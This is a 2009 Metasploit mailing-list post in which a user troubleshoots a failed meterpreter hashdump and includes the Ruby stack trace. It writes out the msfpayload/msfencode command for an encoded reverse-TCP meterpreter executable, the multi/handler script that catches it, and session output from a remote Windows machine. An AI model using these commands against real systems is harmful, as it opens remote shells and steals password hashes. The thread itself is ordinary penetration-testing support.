Metasploit mailing list archives

Problem with meterpreter, priv, hashdump, etc.

From: wfdawson at bellsouth.net (wfdawson at bellsouth.net)
Date: Sat, 18 Apr 2009 19:24:45 +0000
Hi all,

I have used msfpayload to create a .exe to connect back to me successfully in the past, and find it to be a great tool. 
 However, today I seem to be hitting the wall when I try to get a hashdump out of the remote system.  Here's the 
scenario:

I should add, this is all done with a fresh local copy from the subversion trunk, revision 6490, and with ~/.msf3 
removed entirely and refreshed by a new call to msfconsole before starting.

I created an executable with the following command:


./msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=443 R | ./msfencode -e x86/shikata_ga_nai -c 4 -t exe 
-o rv_443.exe

I started msfconsole (as root) with an rc file:


use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST x.x.x.x
set LPORT 443
exploit

My session started just fine:


resource> use exploit/multi/handler
resource> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp           
resource> set LHOST x.x.x.x                    
LHOST => x.x.x.x                               
resource> set LPORT 443                              
LPORT => 443                                         
resource> exploit                                    
[*] Handler binding to LHOST 0.0.0.0                 
[*] Started reverse handler                          
[*] Starting the payload handler...                  

On the remote system, I started the rv_443.exe and saw the connection back to my msfconsole session:


[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)                                         
[*] Sleeping before handling stage...                                  
[*] Uploading DLL (75787 bytes)...                                     
[*] Upload completed.                                                  
[*] Meterpreter session 1 opened (x.x.x.x:443 -> y.y.y.y:1210)

And, I was able to get info back from the remote system, as expected.


meterpreter > sysinfo
Computer: sanitized for the clients protection!
OS      : Windows XP (Build 2600, Service Pack 3).
meterpreter > ls                                  

Listing: C:\DOKUME~1\someuser\LOKALE~1\Temp\FFC0EAB.tmp
=====================================================

Mode              Size     Type  Last modified                   Name                 
----              ----     ----  -------------                   ----                 
40777/rwxrwxrwx   0        dir   Wed Dec 31 19:00:00 -0500 1969  .                    
40777/rwxrwxrwx   0        dir   Wed Dec 31 19:00:00 -0500 1969  ..                   
etc.
etc.
etc.

However, when I tried to use priv and then execute hashdump, or any other command thereafter, I got errors.  I got no 
errors with 'ls' just after 'use priv', but I did get errors with 'ls' after 'hashdump'.


meterpreter > hashdump
[-] Error running command hashdump: wrong number of arguments (0 for 1) 
/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:72:in 
`initialize'/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:72:in 
`exception'/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:72:in 
`raise'/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:72:in 
`send_request'/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/extensions/priv/priv.rb:44:in 
`sam_hashes'/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb:39:in
 `cmd_hashdump'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in 
`send'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in 
`run_command'/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/ui/console.rb:94:in 
`run_command'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in 
`run_single'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in 
`each'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in 
`run_single'/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/ui/console.rb:60:in 
`interact'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/shell.rb:123:in 
`call'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/shell.rb:123:in 
`run'/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/ui/console.rb:58:in 
`interact'/home/wdawson/Software/metasploit/framework3/lib/msf/base/sessions/meterpreter.rb:181:in 
`_interact'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/interactive.rb:48:in 
`interact'/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/command_dispatcher/core.rb:997:in 
`cmd_sessions'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in 
`send'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in 
`run_command'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in 
`run_single'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in 
`each'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in 
`run_single'/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/command_dispatcher/exploit.rb:143:in 
`cmd_exploit'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in 
`send'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in 
`run_command'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in 
`run_single'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in 
`each'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in 
`run_single'/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/driver.rb:190:in 
`load_resource'/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/driver.rb:185:in 
`each_line'/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/driver.rb:185:in 
`load_resource'/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/driver.rb:103:in 
`initialize'./msfconsole:82:in `new'./msfconsole:82                     

Would this be at all due to the fact that the remote system is (seemingly) using a German locale, or is it due to some 
other factor?

Thanks in advance for any suggestions or insight.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090418/69fee30b/attachment.htm>
Current thread:

problem Payload options (php/reverse_php) robert (Apr 18)
- problem Payload options (php/reverse_php) Enrico (Apr 18)
  - Problem with meterpreter, priv, hashdump, etc. wfdawson at bellsouth.net (Apr 18)
    - Problem with meterpreter, priv, hashdump, etc. rogue (Apr 18)
    - Problem with meterpreter, priv, hashdump, etc. wfdawson at bellsouth.net (Apr 18)
- problem Payload options (php/reverse_php) Edward Bjarte Fjellskål (Apr 18)